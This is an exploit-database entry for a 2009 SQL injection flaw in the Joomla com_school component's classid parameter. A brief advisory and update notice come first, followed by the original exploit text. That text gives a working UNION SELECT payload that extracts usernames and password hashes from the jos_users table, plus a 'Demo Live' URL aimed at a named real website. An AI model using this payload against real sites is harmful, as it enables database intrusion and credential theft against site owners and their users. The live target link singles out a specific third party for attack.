Joomla Component com_school (classid) SQL injection Vulnerability

vendor:

school

by:

Chip D3 Bi0s

7,5

CVSS

HIGH

SQL injection

CWE

Product Name: school

Affected Version From: 1.4

Affected Version To: 1.4

Patch Exists: YES

Related CWE: N/A

CPE: a:joomla:school

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Joomla Component com_school (classid) SQL injection Vulnerability

A vulnerability exists in Joomla Component com_school (classid) which allows an attacker to inject malicious SQL commands. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL commands to the vulnerable application. This can result in unauthorized access to sensitive information in the back-end database.

Mitigation:

The vendor has released an update to address this vulnerability. Users are advised to update to the latest version of the application.

Source

Exploit-DB raw data:

----------------------------------------------------------------------
Joomla Component com_school (classid) SQL injection Vulnerability
----------------------------------------------------------------------

 ###################################################
 [+] Author        :  Chip D3 Bi0s
 [+] Email         :  chipdebios[alt+64]gmail.com
 [+] Group         :  LatinHackTeam
 [+] Vulnerability :  SQL injection
 ###################################################

________________________________________________________

Example:

 http://localHost/path/index.php?option=com_school&Itemid=null&func=showclass&classid=<sql Code>

 <Sql Code>:
 -null'+union+select+concat(username,0x3a,password)ChipD3Bi0s,null+from+jos_users/*
 

Demo Live:
http://www.mariadecervello.com/index.php?option=com_school&Itemid=null&func=showclass&classid=-null'+union+select+concat(username,0x3a,password)ChipD3Bi0s,null+from+jos_users/*


+++++++++++++++++++++++++++++++++
[!] Produced in South America
------------------------------------


<name>school</name>
<creationDate>18 July 2006</creationDate>
<author>Soner (pisdoktor) Ekici - Alex Chaparro</author>
<copyright>
This component in released under the GNU/GPL License
</copyright>
<authorEmail>damj3t@gmail.com</authorEmail>
<authorUrl>www.joomla.cl</authorUrl>
<version>1.4</version>

# milw0rm.com [2009-06-08]